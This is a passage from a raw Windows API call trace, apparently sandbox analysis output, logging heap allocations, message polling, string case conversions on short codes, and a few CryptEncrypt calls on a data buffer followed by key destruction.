lpMsg=0x8bf160) returned 0 [0206.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0206.676] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0206.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0206.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0206.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0206.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.677] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0206.677] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.677] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0206.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.677] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.677] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0206.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0206.678] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.678] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.678] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.678] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.678] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0206.678] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.678] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0206.678] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.678] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.678] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.679] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.679] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.679] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.679] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.679] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.679] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.679] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.679] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.679] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.679] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.680] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.680] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xf2fd, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xf300) returned 1 [0206.680] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.680] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.680] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.680] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.680] CharLowerBuffW (in: lpsz="byte[62208]", cchLength=0xb | out: lpsz="byte[62208]") returned 0xb [0206.681] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.681] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.682] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.682] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.682] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.682] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.682] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.682] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.682] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34d2260*, pdwDataLen=0x8bef68*=0xf2fd, dwBufLen=0xf300 | out: pbData=0x34d2260*, pdwDataLen=0x8bef68*=0xf300) returned 1 [0206.683] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.683] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.683] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.683] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.683] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.684] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.684] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.684] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0206.684] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.684] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0206.684] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.684] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.684] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0206.684] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.684] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0206.684] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.684] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.685] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.685] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.685] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.685] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.685] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.685] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.685] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.685] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.685] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.685] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.690] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.690] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.690] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.691] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.692] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.692] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0206.692] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.692] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0206.692] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.692] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.692] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.692] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0206.692] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.692] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0206.692] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0206.692] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.692] CryptDestroyKey (hKey=0xaa5860) returned 1 [0206.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0206.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0206.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0206.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0206.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0206.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0206.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0206.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0206.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0206.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0206.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0206.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0206.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0206.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0206.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0206.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0206.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0206.695] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0206.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0206.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0206.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0206.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0206.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0206.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0206.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0206.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0206.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.696] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0206.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0206.696] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0206.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0206.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ee8 [0206.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.697] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0206.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0206.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0206.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0206.697] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0206.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0206.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0206.698] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0206.698] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0206.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0206.698] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0206.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: 